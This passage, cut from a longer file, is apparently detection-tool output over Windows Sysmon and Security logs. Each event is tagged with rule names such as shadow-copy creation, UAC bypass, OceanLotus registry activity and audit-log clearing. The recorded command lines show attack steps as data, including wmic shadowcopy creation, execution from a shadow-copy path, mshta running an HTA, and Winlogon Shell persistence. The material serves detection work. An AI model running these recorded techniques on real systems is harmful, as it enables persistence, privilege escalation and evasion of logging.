","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"6661D424-EC73-5EFE-0000-00109FEA6300","ParentProcessId":6292,"ProcessGuid":"6661D424-F4F6-5EFE-0000-0010E7EFF800","ProcessId":6860,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"ECORP\\Administrator","UtcTime":"2020-07-03 09:05:58.268"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"win10.ecorp.com","Correlation":null,"EventID":1,"EventRecordID":400702,"Execution_attributes":{"ProcessID":1444,"ThreadID":3796},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-07-03T09:05:58.278154Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\system32\\svchost.exe","ProcessGuid":"6661D424-9438-5EEF-0000-00104DA20000","ProcessId":792,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\S-1-5-21-2190595668-4244358899-639490025-500\\\\Device\\HarddiskVolume4\\Windows\\explorer.exe","UtcTime":"2020-07-03 09:05:58.319"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"win10.ecorp.com","Correlation":null,"EventID":13,"EventRecordID":400703,"Execution_attributes":{"ProcessID":1444,"ThreadID":3796},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-03T09:05:58.364162Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"00000000-0000-0000-0000-000000000000","ProcessId":6860,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\S-1-5-21-2190595668-4244358899-639490025-500\\\\Device\\HarddiskVolume4\\Windows\\explorer.exe","UtcTime":"2020-07-03 09:05:58.547"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"win10.ecorp.com","Correlation":null,"EventID":13,"EventRecordID":400707,"Execution_attributes":{"ProcessID":1444,"ThreadID":3796},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-03T09:05:58.619637Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\System32\\calc.exe","ProcessGuid":"6661D424-F4F6-5EFE-0000-0010C00AF900","ProcessId":3224,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\S-1-5-21-2190595668-4244358899-639490025-500\\\\Device\\HarddiskVolume4\\Windows\\System32\\win32calc.exe","UtcTime":"2020-07-03 09:05:58.707"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"win10.ecorp.com","Correlation":null,"EventID":13,"EventRecordID":400708,"Execution_attributes":{"ProcessID":1444,"ThreadID":3796},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-03T09:05:58.737753Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"whoami /groups ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"System","LogonGuid":"365ABB72-7B40-5CEC-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"cmd.exe /c whoami /groups ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-FE66-5CEB-0000-001058F50B00","ParentProcessId":3256,"ProcessGuid":"365ABB72-FE66-5CEB-0000-0010C7F80B00","ProcessId":1168,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-05-27 15:12:38.270"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":6170,"Execution_attributes":{"ProcessID":980,"ThreadID":2220},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-27T15:12:38.290374Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Shadow Copies Creation Using Operating Systems Utilities"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\wbem\\wmic.exe /output:C:\\Windows\\TEMP\\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create \"ClientAccessible\", \"C:\\\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"WMI Commandline Utility","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443","Image":"C:\\Windows\\System32\\wbem\\WMIC.exe","IntegrityLevel":"System","LogonGuid":"365ABB72-7B40-5CEC-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"cmd.exe /c %SYSTEMROOT%\\system32\\wbem\\wmic.exe /output:C:\\Windows\\TEMP\\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create \"ClientAccessible\", \"C:\\\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-FE6F-5CEB-0000-0010F4370C00","ParentProcessId":3448,"ProcessGuid":"365ABB72-FE6F-5CEB-0000-0010D33A0C00","ProcessId":3344,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-05-27 15:12:47.456"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":6182,"Execution_attributes":{"ProcessID":980,"ThreadID":2220},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-27T15:12:47.478285Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious WMI Execution","Shadow Copies Creation Using Operating Systems Utilities"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\wbem\\wmic.exe process call create \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy7\\\\Windows\\Temp\\svhost64.exe ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"WMI Commandline Utility","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443","Image":"C:\\Windows\\System32\\wbem\\WMIC.exe","IntegrityLevel":"System","LogonGuid":"365ABB72-7B40-5CEC-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"cmd.exe /c %SYSTEMROOT%\\system32\\wbem\\wmic.exe process call create \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy7\\\\Windows\\Temp\\svhost64.exe ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-FE76-5CEB-0000-0010546E0C00","ParentProcessId":2356,"ProcessGuid":"365ABB72-FE76-5CEB-0000-001077710C00","ProcessId":2840,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-05-27 15:12:54.515"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":6190,"Execution_attributes":{"ProcessID":980,"ThreadID":2220},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-27T15:12:54.544664Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Script Execution From Temp Folder"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\mshta.exe\" \"C:\\Users\\IEUser\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\S97WTYG7\\update.hta\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\","Description":"Microsoft (R) HTML Application host","FileVersion":"11.00.9600.16428 (winblue_gdr.131013-1700)","Hashes":"SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A","Image":"C:\\Windows\\System32\\mshta.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-98E4-5D04-0000-0020A4350100","LogonId":"0x135a4","ParentCommandLine":"\"C:\\Program Files\\Internet Explorer\\iexplore.exe\" C:\\Users\\IEUser\\Downloads\\update.html","ParentImage":"C:\\Program Files\\Internet Explorer\\iexplore.exe","ParentProcessGuid":"365ABB72-9972-5D04-0000-0010F0490C00","ParentProcessId":3660,"ProcessGuid":"365ABB72-9AA6-5D04-0000-00109C850F00","ProcessId":652,"Product":"Internet Explorer","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-06-15 07:13:42.278"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":7648,"Execution_attributes":{"ProcessID":2044,"ThreadID":2092},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-06-15T07:13:42.294109Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Rundll32 Without Parameters"],"event":{"Event":{"EventData":{"CommandLine":"rundll32.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-0A6F-5D1D-0000-0020CA350100","LogonId":"0x135ca","ParentCommandLine":"\"C:\\Windows\\system32\\notepad.exe\" ","ParentImage":"C:\\Windows\\System32\\notepad.exe","ParentProcessGuid":"365ABB72-1256-5D1D-0000-0010FB1A1B00","ParentProcessId":1632,"ProcessGuid":"365ABB72-1282-5D1D-0000-0010DD401B00","ProcessId":2328,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-07-03 20:39:30.254"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":8352,"Execution_attributes":{"ProcessID":112,"ThreadID":2084},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-03T20:39:30.254733Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - User added to interesting group"],"event":{"Event":{"EventData":{"MemberName":"-","MemberSid":"S-1-5-21-3461203602-4096304019-2269080069-501","PrivilegeList":"-","SubjectDomainName":"MSEDGEWIN10","SubjectLogonId":"0x27a10f","SubjectUserName":"IEUser","SubjectUserSid":"S-1-5-21-3461203602-4096304019-2269080069-1000","TargetDomainName":"Builtin","TargetSid":"S-1-5-32-544","TargetUserName":"Administrators"},"System":{"Channel":"Security","Computer":"MSEDGEWIN10","Correlation_attributes":{"ActivityID":"15957A0B-7182-0000-A07A-95158271D501"},"EventID":4732,"EventRecordID":191029,"Execution_attributes":{"ProcessID":624,"ThreadID":4452},"Keywords":"0x8020000000000000","Level":0,"Opcode":0,"Provider_attributes":{"Guid":"54849625-5478-4994-A5BA-3E3B0328C30D","Name":"Microsoft-Windows-Security-Auditing"},"Security":null,"Task":13826,"TimeCreated_attributes":{"SystemTime":"2019-09-22T11:22:05.201727Z"},"Version":0}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - User added to interesting group"],"event":{"Event":{"EventData":{"MemberName":"-","MemberSid":"S-1-5-20","PrivilegeList":"-","SubjectDomainName":"MSEDGEWIN10","SubjectLogonId":"0x27a10f","SubjectUserName":"IEUser","SubjectUserSid":"S-1-5-21-3461203602-4096304019-2269080069-1000","TargetDomainName":"Builtin","TargetSid":"S-1-5-32-544","TargetUserName":"Administrators"},"System":{"Channel":"Security","Computer":"MSEDGEWIN10","Correlation_attributes":{"ActivityID":"15957A0B-7182-0000-A07A-95158271D501"},"EventID":4732,"EventRecordID":191030,"Execution_attributes":{"ProcessID":624,"ThreadID":5108},"Keywords":"0x8020000000000000","Level":0,"Opcode":0,"Provider_attributes":{"Guid":"54849625-5478-4994-A5BA-3E3B0328C30D","Name":"Microsoft-Windows-Security-Auditing"},"Security":null,"Task":13826,"TimeCreated_attributes":{"SystemTime":"2019-09-22T11:23:19.251925Z"},"Version":0}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"DC1.insecurebank.local","Correlation":null,"EventID":1102,"EventRecordID":203050,"Execution_attributes":{"ProcessID":744,"ThreadID":768},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2019-05-08T03:00:11.778188Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"insecurebank","SubjectLogonId":"0x218b896","SubjectUserName":"administrator","SubjectUserSid":"S-1-5-21-738609754-2819869699-4189121830-500"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"DC1.insecurebank.local","Correlation":null,"EventID":1102,"EventRecordID":198242566,"Execution_attributes":{"ProcessID":744,"ThreadID":3396},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2019-03-25T21:28:11.073626Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"insecurebank","SubjectLogonId":"0x8d7099","SubjectUserName":"bob","SubjectUserSid":"S-1-5-21-738609754-2819869699-4189121830-1108"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-06-14 22:22:21.503","Image":"C:\\Users\\IEUser\\Downloads\\a.exe","ProcessGuid":"365ABB72-1E19-5D04-0000-0010DFC60A00","ProcessId":4020,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\9QxTsAU9w8gyPj4w\\BRE6BgE2JubB.exe","UtcTime":"2019-06-14 22:22:21.503"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":7531,"Execution_attributes":{"ProcessID":1960,"ThreadID":288},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-06-14T22:22:21.503995Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"\"C:\\Users\\IEUser\\AppData\\Roaming\\9QxTsAU9w8gyPj4w\\BRE6BgE2JubB.exe\",explorer.exe","EventType":"SetValue","Image":"C:\\Users\\IEUser\\Downloads\\a.exe","ProcessGuid":"365ABB72-1E19-5D04-0000-0010DFC60A00","ProcessId":4020,"RuleName":"Persistence - Winlogon Shell","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell","UtcTime":"2019-06-14 22:22:21.519"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":7532,"Execution_attributes":{"ProcessID":1960,"ThreadID":288},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-06-14T22:22:21.535245Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["WMI Modules Loaded"],"event":{"Event":{"EventData":{"Company":"Microsoft Corporation","Description":"WMI","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=03DC8ABDF9C9948FE6E783DCA9C6C8264D635F0A,MD5=5610B0425518D185331CB8E968D060E6,SHA256=E235186C3BF266EE9EC733D2CFF35E3A65DE039C19B14260F4054F34B5E8AD41,IMPHASH=523D1DB34FC36465E35F6201A2FD561B","Image":"C:\\Users\\IEUser\\Downloads\\a.exe","ImageLoaded":"C:\\Windows\\System32\\wbem\\wmiutils.dll","ProcessGuid":"365ABB72-1E1D-5D04-0000-001003E70A00","ProcessId":1008,"Product":"Microsoft® Windows® Operating System","RuleName":"Execution - Suspicious WMI module load","Signature":"Microsoft Windows","SignatureStatus":"Valid","Signed":"true","UtcTime":"2019-06-14 22:22:31.925"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":7,"EventRecordID":7536,"Execution_attributes":{"ProcessID":1960,"ThreadID":1916},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2019-06-14T22:22:31.957120Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Logon Scripts (UserInitMprLogonScript)","Suspicious Userinit Child Process"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Users\\IEUser\\AppData\\Roaming\\9QxTsAU9w8gyPj4w\\BRE6BgE2JubB.exe\"","Company":"","CurrentDirectory":"C:\\Windows\\system32\\","Description":"NpmTaskRunner","FileVersion":"1.0.0.0","Hashes":"SHA1=E2286C233467D0E164ED5ED1D07BAC9F90F74D19,MD5=41CE32C0D1D4E5BB8C63674F317450EF,SHA256=5DE788D23B247B29F116CD0583280CE10A429E9F8C1D80C42DEAB20C6F4DBB4E,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","Image":"C:\\Users\\IEUser\\AppData\\Roaming\\9QxTsAU9w8gyPj4w\\BRE6BgE2JubB.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-1E4A-5D04-0000-002013C00B00","LogonId":"0xbc013","ParentCommandLine":"C:\\Windows\\system32\\userinit.exe","ParentImage":"C:\\Windows\\System32\\userinit.exe","ParentProcessGuid":"365ABB72-1E51-5D04-0000-00104C340C00","ParentProcessId":3448,"ProcessGuid":"365ABB72-1E51-5D04-0000-00107B380C00","ProcessId":3444,"Product":"NpmTaskRunner","RuleName":"","TerminalSessionId":2,"User":"IEWIN7\\IEUser","UtcTime":"2019-06-14 22:23:13.925"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":7556,"Execution_attributes":{"ProcessID":1960,"ThreadID":288},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-06-14T22:23:13.957120Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["WMI Modules Loaded"],"event":{"Event":{"EventData":{"Company":"Microsoft Corporation","Description":"WMI","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=03DC8ABDF9C9948FE6E783DCA9C6C8264D635F0A,MD5=5610B0425518D185331CB8E968D060E6,SHA256=E235186C3BF266EE9EC733D2CFF35E3A65DE039C19B14260F4054F34B5E8AD41,IMPHASH=523D1DB34FC36465E35F6201A2FD561B","Image":"C:\\Users\\IEUser\\AppData\\Roaming\\9QxTsAU9w8gyPj4w\\BRE6BgE2JubB.exe","ImageLoaded":"C:\\Windows\\System32\\wbem\\wmiutils.dll","ProcessGuid":"365ABB72-1E54-5D04-0000-0010B7B30C00","ProcessId":1724,"Product":"Microsoft® Windows® Operating System","RuleName":"Execution - Suspicious WMI module load","Signature":"Microsoft Windows","SignatureStatus":"Valid","Signed":"true","UtcTime":"2019-06-14 22:23:26.811"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":7,"EventRecordID":7563,"Execution_attributes":{"ProcessID":1960,"ThreadID":288},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2019-06-14T22:23:26.811612Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\regedit.exe","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-8DEC-5F00-0000-0010F0460800","ProcessId":5128,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.reg\\OpenWithList\\b","UtcTime":"2020-07-04 14:31:23.825"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":306383,"Execution_attributes":{"ProcessID":3400,"ThreadID":4136},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-04T14:31:23.903600Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\regedit.exe","ProcessGuid":"747F3D96-92BB-5F00-0000-0010C1A73100","ProcessId":1452,"RuleName":"Persistence - Pending GPO","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\IEAK\\GroupPolicy\\PendingGPOs\\Count","UtcTime":"2020-07-04 14:31:26.607"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":306384,"Execution_attributes":{"ProcessID":3400,"ThreadID":4136},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-04T14:31:26.838832Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DefaultInstall","EventType":"SetValue","Image":"C:\\Windows\\regedit.exe","ProcessGuid":"747F3D96-92BB-5F00-0000-0010C1A73100","ProcessId":1452,"RuleName":"Persistence - Pending GPO","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\IEAK\\GroupPolicy\\PendingGPOs\\Section1","UtcTime":"2020-07-04 14:31:26.607"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":306385,"Execution_attributes":{"ProcessID":3400,"ThreadID":4136},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-04T14:31:26.849140Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"c:\\programdata\\gpo.inf","EventType":"SetValue","Image":"C:\\Windows\\regedit.exe","ProcessGuid":"747F3D96-92BB-5F00-0000-0010C1A73100","ProcessId":1452,"RuleName":"Persistence - Pending 